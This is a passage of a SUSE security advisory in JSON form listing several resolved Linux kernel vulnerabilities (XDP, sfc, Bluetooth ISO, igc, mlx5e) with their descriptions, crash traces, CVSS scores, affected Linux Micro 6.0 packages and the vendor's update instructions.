"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54154"
},
{
"cve": "CVE-2023-54155",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54155"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: core: remove unnecessary frame_sz check in bpf_xdp_adjust_tail()\n\nSyzkaller reported the following issue:\n=======================================\nToo BIG xdp-\u003eframe_sz = 131072\nWARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121\n ____bpf_xdp_adjust_tail net/core/filter.c:4121 [inline]\nWARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121\n bpf_xdp_adjust_tail+0x466/0xa10 net/core/filter.c:4103\n...\nCall Trace:\n \u003cTASK\u003e\n bpf_prog_4add87e5301a4105+0x1a/0x1c\n __bpf_prog_run include/linux/filter.h:600 [inline]\n bpf_prog_run_xdp include/linux/filter.h:775 [inline]\n bpf_prog_run_generic_xdp+0x57e/0x11e0 net/core/dev.c:4721\n netif_receive_generic_xdp net/core/dev.c:4807 [inline]\n do_xdp_generic+0x35c/0x770 net/core/dev.c:4866\n tun_get_user+0x2340/0x3ca0 drivers/net/tun.c:1919\n tun_chr_write_iter+0xe8/0x210 drivers/net/tun.c:2043\n call_write_iter include/linux/fs.h:1871 [inline]\n new_sync_write fs/read_write.c:491 [inline]\n vfs_write+0x650/0xe40 fs/read_write.c:584\n ksys_write+0x12f/0x250 fs/read_write.c:637\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nxdp-\u003eframe_sz \u003e PAGE_SIZE check was introduced in commit c8741e2bfe87\n(\"xdp: Allow bpf_xdp_adjust_tail() to grow packet size\"). But Jesper\nDangaard Brouer \u003cjbrouer@redhat.com\u003e noted that after introducing the\nxdp_init_buff() which all XDP driver use - it\u0027s safe to remove this\ncheck. The original intend was to catch cases where XDP drivers have\nnot been updated to use xdp.frame_sz, but that is not longer a concern\n(since xdp_init_buff).\n\nRunning the initial syzkaller repro it was discovered that the\ncontiguous physical memory allocation is used for both xdp paths in\ntun_get_user(), e.g. tun_build_skb() and tun_alloc_skb(). It was also\nstated by Jesper Dangaard Brouer \u003cjbrouer@redhat.com\u003e that XDP can\nwork on higher order pages, as long as this is contiguous physical\nmemory (e.g. a page).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54155",
"url": "https://www.suse.com/security/cve/CVE-2023-54155"
},
{
"category": "external",
"summary": "SUSE Bug 1256083 for CVE-2023-54155",
"url": "https://bugzilla.suse.com/1256083"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54155"
},
{
"cve": "CVE-2023-54156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsfc: fix crash when reading stats while NIC is resetting\n\nefx_net_stats() (.ndo_get_stats64) can be called during an ethtool\n selftest, during which time nic_data-\u003emc_stats is NULL as the NIC has\n been fini\u0027d. In this case do not attempt to fetch the latest stats\n from the hardware, else we will crash on a NULL dereference:\n BUG: kernel NULL pointer dereference, address: 0000000000000038\n RIP efx_nic_update_stats\n abridged calltrace:\n efx_ef10_update_stats_pf\n efx_net_stats\n dev_get_stats\n dev_seq_printf_stats\nSkipping the read is safe, we will simply give out stale stats.\nTo ensure that the free in efx_ef10_fini_nic() does not race against\n efx_ef10_update_stats_pf(), which could cause a TOCTTOU bug, take the\n efx-\u003estats_lock in fini_nic (it is already held across update_stats).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54156",
"url": "https://www.suse.com/security/cve/CVE-2023-54156"
},
{
"category": "external",
"summary": "SUSE Bug 1255704 for CVE-2023-54156",
"url": "https://bugzilla.suse.com/1255704"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54156"
},
{
"cve": "CVE-2023-54164",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54164"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: ISO: fix iso_conn related locking and validity issues\n\nsk-\u003esk_state indicates whether iso_pi(sk)-\u003econn is valid. Operations\nthat check/update sk_state and access conn should hold lock_sock,\notherwise they can race.\n\nThe order of taking locks is hci_dev_lock \u003e lock_sock \u003e iso_conn_lock,\nwhich is how it is in connect/disconnect_cfm -\u003e iso_conn_del -\u003e\niso_chan_del.\n\nFix locking in iso_connect_cis/bis and sendmsg/recvmsg to take lock_sock\naround updating sk_state and conn.\n\niso_conn_del must not occur during iso_connect_cis/bis, as it frees the\niso_conn. Hold hdev-\u003elock longer to prevent that.\n\nThis should not reintroduce the issue fixed in commit 241f51931c35\n(\"Bluetooth: ISO: Avoid circular locking dependency\"), since the we\nacquire locks in order. We retain the fix in iso_sock_connect to release\nlock_sock before iso_connect_* acquires hdev-\u003elock.\n\nSimilarly for commit 6a5ad251b7cd (\"Bluetooth: ISO: Fix possible\ncircular locking dependency\"). We retain the fix in iso_conn_ready to\nnot acquire iso_conn_lock before lock_sock.\n\niso_conn_add shall return iso_conn with valid hcon. Make it so also when\nreusing an old CIS connection waiting for disconnect timeout (see\n__iso_sock_close where conn-\u003ehcon is set to NULL).\n\nTrace with iso_conn_del after iso_chan_add in iso_connect_cis:\n===============================================================\niso_sock_create:771: sock 00000000be9b69b7\niso_sock_init:693: sk 000000004dff667e\niso_sock_bind:827: sk 000000004dff667e 70:1a:b8:98:ff:a2 type 1\niso_sock_setsockopt:1289: sk 000000004dff667e\niso_sock_setsockopt:1289: sk 000000004dff667e\niso_sock_setsockopt:1289: sk 000000004dff667e\niso_sock_connect:875: sk 000000004dff667e\niso_connect_cis:353: 70:1a:b8:98:ff:a2 -\u003e 28:3d:c2:4a:7e:da\nhci_get_route:1199: 70:1a:b8:98:ff:a2 -\u003e 28:3d:c2:4a:7e:da\nhci_conn_add:1005: hci0 dst 28:3d:c2:4a:7e:da\niso_conn_add:140: hcon 000000007b65d182 conn 00000000daf8625e\n__iso_chan_add:214: conn 00000000daf8625e\niso_connect_cfm:1700: hcon 000000007b65d182 bdaddr 28:3d:c2:4a:7e:da status 12\niso_conn_del:187: hcon 000000007b65d182 conn 00000000daf8625e, err 16\niso_sock_clear_timer:117: sock 000000004dff667e state 3\n \u003cNote: sk_state is BT_BOUND (3), so iso_connect_cis is still\n running at this point\u003e\niso_chan_del:153: sk 000000004dff667e, conn 00000000daf8625e, err 16\nhci_conn_del:1151: hci0 hcon 000000007b65d182 handle 65535\nhci_conn_unlink:1102: hci0: hcon 000000007b65d182\nhci_chan_list_flush:2780: hcon 000000007b65d182\niso_sock_getsockopt:1376: sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_getsockopt:1376: sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_shutdown:1434: sock 00000000be9b69b7, sk 000000004dff667e, how 1\n__iso_sock_close:632: sk 000000004dff667e state 5 socket 00000000be9b69b7\n \u003cNote: sk_state is BT_CONNECT (5), even though iso_chan_del sets\n BT_CLOSED (6). Only iso_connect_cis sets it to BT_CONNECT, so it\n must be that iso_chan_del occurred between iso_chan_add and end of\n iso_connect_cis.\u003e\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nPGD 8000000006467067 P4D 8000000006467067 PUD 3f5f067 PMD 0\nOops: 0000 [#1] PREEMPT SMP PTI\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-1.fc38 04/01/2014\nRIP: 0010:__iso_sock_close (net/bluetooth/iso.c:664) bluetooth\n===============================================================\n\nTrace with iso_conn_del before iso_chan_add in iso_connect_cis:\n===============================================================\niso_connect_cis:356: 70:1a:b8:98:ff:a2 -\u003e 28:3d:c2:4a:7e:da\n...\niso_conn_add:140: hcon 0000000093bc551f conn 00000000768ae504\nhci_dev_put:1487: hci0 orig refcnt 21\nhci_event_packet:7607: hci0: e\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54164",
"url": "https://www.suse.com/security/cve/CVE-2023-54164"
},
{
"category": "external",
"summary": "SUSE Bug 1256071 for CVE-2023-54164",
"url": "https://bugzilla.suse.com/1256071"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54164"
},
{
"cve": "CVE-2023-54166",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54166"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nigc: Fix Kernel Panic during ndo_tx_timeout callback\n\nThe Xeon validation group has been carrying out some loaded tests\nwith various HW configurations, and they have seen some transmit\nqueue time out happening during the test. This will cause the\nreset adapter function to be called by igc_tx_timeout().\nSimilar race conditions may arise when the interface is being brought\ndown and up in igc_reinit_locked(), an interrupt being generated, and\nigc_clean_tx_irq() being called to complete the TX.\n\nWhen the igc_tx_timeout() function is invoked, this patch will turn\noff all TX ring HW queues during igc_down() process. TX ring HW queues\nwill be activated again during the igc_configure_tx_ring() process\nwhen performing the igc_up() procedure later.\n\nThis patch also moved existing igc_disable_tx_ring_hw() to avoid using\nforward declaration.\n\nKernel trace:\n[ 7678.747813] ------------[ cut here ]------------\n[ 7678.757914] NETDEV WATCHDOG: enp1s0 (igc): transmit queue 2 timed out\n[ 7678.770117] WARNING: CPU: 0 PID: 13 at net/sched/sch_generic.c:525 dev_watchdog+0x1ae/0x1f0\n[ 7678.784459] Modules linked in: xt_conntrack nft_chain_nat xt_MASQUERADE xt_addrtype nft_compat\nnf_tables nfnetlink br_netfilter bridge stp llc overlay dm_mod emrcha(PO) emriio(PO) rktpm(PO)\ncegbuf_mod(PO) patch_update(PO) se(PO) sgx_tgts(PO) mktme(PO) keylocker(PO) svtdx(PO) svfs_pci_hotplug(PO)\nvtd_mod(PO) davemem(PO) svmabort(PO) svindexio(PO) usbx2(PO) ehci_sched(PO) svheartbeat(PO) ioapic(PO)\nsv8259(PO) svintr(PO) lt(PO) pcierootport(PO) enginefw_mod(PO) ata(PO) smbus(PO) spiflash_cdf(PO) arden(PO)\ndsa_iax(PO) oobmsm_punit(PO) cpm(PO) svkdb(PO) ebg_pch(PO) pch(PO) sviotargets(PO) svbdf(PO) svmem(PO)\nsvbios(PO) dram(PO) svtsc(PO) targets(PO) superio(PO) svkernel(PO) cswitch(PO) mcf(PO) pentiumIII_mod(PO)\nfs_svfs(PO) mdevdefdb(PO) svfs_os_services(O) ixgbe mdio mdio_devres libphy emeraldrapids_svdefs(PO)\nregsupport(O) libnvdimm nls_cp437 snd_hda_codec_realtek snd_hda_codec_generic ledtrig_audio snd_hda_intel\nsnd_intel_dspcfg snd_hda_codec snd_hwdep x86_pkg_temp_thermal snd_hda_core snd_pcm snd_timer isst_if_mbox_pci\n[ 7678.784496] input_leds isst_if_mmio sg snd isst_if_common soundcore wmi button sad9(O) drm fuse backlight\nconfigfs efivarfs ip_tables x_tables vmd sdhci led_class rtl8150 r8152 hid_generic pegasus mmc_block usbhid\nmmc_core hid megaraid_sas ixgb igb i2c_algo_bit ice i40e hpsa scsi_transport_sas e1000e e1000 e100 ax88179_178a\nusbnet xhci_pci sd_mod xhci_hcd t10_pi crc32c_intel crc64_rocksoft igc crc64 crc_t10dif usbcore\ncrct10dif_generic ptp crct10dif_common usb_common pps_core\n[ 7679.200403] RIP: 0010:dev_watchdog+0x1ae/0x1f0\n[ 7679.210201] Code: 28 e9 53 ff ff ff 4c 89 e7 c6 05 06 42 b9 00 01 e8 17 d1 fb ff 44 89 e9 4c\n89 e6 48 c7 c7 40 ad fb 81 48 89 c2 e8 52 62 82 ff \u003c0f\u003e 0b e9 72 ff ff ff 65 8b 05 80 7d 7c 7e\n89 c0 48 0f a3 05 0a c1\n[ 7679.245438] RSP: 0018:ffa00000001f7d90 EFLAGS: 00010282\n[ 7679.256021] RAX: 0000000000000000 RBX: ff11000109938440 RCX: 0000000000000000\n[ 7679.268710] RDX: ff11000361e26cd8 RSI: ff11000361e1b880 RDI: ff11000361e1b880\n[ 7679.281314] RBP: ffa00000001f7da8 R08: ff1100035f8fffe8 R09: 0000000000027ffb\n[ 7679.293840] R10: 0000000000001f0a R11: ff1100035f840000 R12: ff11000109938000\n[ 7679.306276] R13: 0000000000000002 R14: dead000000000122 R15: ffa00000001f7e18\n[ 7679.318648] FS: 0000000000000000(0000) GS:ff11000361e00000(0000) knlGS:0000000000000000\n[ 7679.332064] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 7679.342757] CR2: 00007ffff7fca168 CR3: 000000013b08a006 CR4: 0000000000471ef8\n[ 7679.354984] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 7679.367207] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 7679.379370] PKRU: 55555554\n[ 7679.386446] Call Trace:\n[ 7679.393152] \u003cTASK\u003e\n[ 7679.399363] ? __pfx_dev_watchdog+0x10/0x10\n[ 7679.407870] call_timer_fn+0x31/0x110\n[ 7679.415698] e\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54166",
"url": "https://www.suse.com/security/cve/CVE-2023-54166"
},
{
"category": "external",
"summary": "SUSE Bug 1256074 for CVE-2023-54166",
"url": "https://bugzilla.suse.com/1256074"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54166"
},
{
"cve": "CVE-2023-54169",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54169"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: fix memory leak in mlx5e_ptp_open\n\nWhen kvzalloc_node or kvzalloc failed in mlx5e_ptp_open, the memory\npointed by \"c\" or \"cparams\" is not freed, which can lead to a memory\nleak. Fix by freeing the array in the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54169",
"url": "https://www.suse.com/security/cve/CVE-2023-54169"
},
{
"category": "external",
"summary": "SUSE Bug 1256050 for CVE-2023-54169",
"url": "https://bugzilla.suse.com/1256050"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
